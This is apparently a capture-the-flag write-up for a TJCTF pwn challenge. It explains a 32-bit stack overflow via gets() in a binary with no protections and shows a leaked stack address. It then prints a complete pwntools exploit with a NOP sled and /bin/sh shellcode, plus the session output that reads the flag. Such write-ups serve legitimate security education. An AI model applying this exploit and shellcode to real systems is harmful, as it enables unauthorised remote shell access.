Rating:
50
My friend keeps talking about Old School RuneScape. He says he made a service to tell you about trees.
I don't know what any of this means but this system sure looks old! It has like zero security features enabled...
nc p1.tjctf.org 8006Written by KyleForkBomb
Tags: pwn x86 bof remote-shell gets shellcode nop-sled
No mitigations, 32-bit stack overflow, NOP sled, shellcode.
Retro.
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
No mitigations. Choose your own adventure.
Line 10, gets vulnerability. local_110 is large enough for shellcode.
Line 14, leaks a stack address. Although the challenge server has like zero security features enabled..., the location of the stack may change:
I don't have the tree -9332 :(
I don't have the tree -9204 :(
I don't have the tree -9188 :(
I don't have the tree -9220 :(
I don't have the tree -9156 :(
However, the general vicinity does not change much (remotely).
local_110 is 0x110 bytes above the return address:
int EAX:4 <RETURN>
undefined4 Stack[-0x10]:4 local_10
undefined1 Stack[-0x110]:1 local_110
We just need to write out 0x110 bytes, the estimated location of the return address (+4 for the next stack line), a NOP sled, some shellcode, and cross our fingers.
#!/usr/bin/python3
from pwn import *
#p = process('./osrs')
p = remote('p1.tjctf.org', 8006)
buf = 0xffffdc2b # -9173
ret = buf + 0x110
#http://shell-storm.org/shellcode/files/shellcode-851.php
shellcode = b'\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00'
payload = 0x110 * b'A'
payload += p32(ret + 4)
payload += 100 * b'\x90'
payload += shellcode
p.recvuntil('Enter a tree type:')
p.sendline(payload)
p.interactive()
Output:
# ./exploit.py
[+] Opening connection to p1.tjctf.org on port 8006: Done
[*] Switching to interactive mode
I don't have the tree -9188 :(
$ cat flag.txt
tjctf{tr33_c0de_in_my_she115}
